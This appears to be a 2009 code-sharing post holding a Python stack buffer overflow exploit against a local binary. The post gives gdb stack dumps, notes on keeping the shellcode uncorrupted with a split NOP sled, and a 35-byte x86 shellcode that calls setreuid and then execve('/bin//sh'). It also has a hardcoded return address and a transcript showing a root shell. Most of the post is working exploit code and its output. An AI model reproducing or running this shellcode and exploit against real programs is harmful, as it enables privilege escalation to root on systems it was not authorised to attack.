The Code-Bin
untitled Python Code
Posted by: huhu | September 13, 2009 @ 9:18pm
Python Code
#!/usr/bin/env python
"""
OK so it seems I made a mistake in my original notes. sorry ;>

tip) check the stack to make sure your shellcode is not being corrupted.
ex:
(gdb) x/10x $esp - 47
0xbffff591:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a1:     0x90909090      0x90909090      0xdb31c031      0xd231c931
0xbffff5b1:     0x80cd46b0      0x2f2f6851
(gdb)
0xbffff5b9:     0x2f686873      0x006e6962      0x2f000000      0x2f6e6962
0xbffff5c9:     0x0068732f      0x00000000      0xf0bffff7      0x48bffff5
0xbffff5d9:     0x75bffff6      0x70b7e8a7
(gdb) quit

we see our shellcode starting at 0xbffff5a1. going through the addresses we
see it gets corrupted for some reason at 0xbffff5b9: null bytes -> fail.

Solution:
EIP resides at buffer = 1032 exactly, so your buffer has to be 1028 bytes,
not 1032, since you use those extra 4 bytes as the EIP address..
anyway for this bug I just split the buffer up like so:

NOPS      -> 428 bytes
SHELLCODE -> 35 bytes
NOPS      -> 565 bytes
RET       -> 4 bytes

>>> 428 + 35 + 565 + 4
1032

(gdb) x/10x $esp - 625
0xbffff35f:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff36f:     0x90909090      0x31c03190      0x31c931db      0xcd46b0d2
0xbffff37f:     0x2f685180      0x6868732f
(gdb) quit

as you can see our shellcode is not corrupted this time as it was last time :D
---
root@user-laptop:/home/user# nano bleh.py
root@user-laptop:/home/user# python bleh.py
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
"""
import os
import struct

# shellcode len is 35
shellcode = (
    "\x31\xc0\x31\xdb\x31\xc9"
    "\x31\xd2\xb0\x46\xcd\x80"
    "\x51\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89"
    "\xe3\x51\x53\x89\xe1\x31"
    "\xc0\xb0\x0b\xcd\x80"
)

# EIP OVERWRITE IS AT 1032
lols = "\x90" * 428
lols += shellcode
lols += "\x90" * 565
lols += struct.pack('<L', 0xbffff35f)
print os.system("./hu %s" % lols)
Author Comments
none
Rating
4.49 / 8
65 Votes
http://codebin.yi.org/379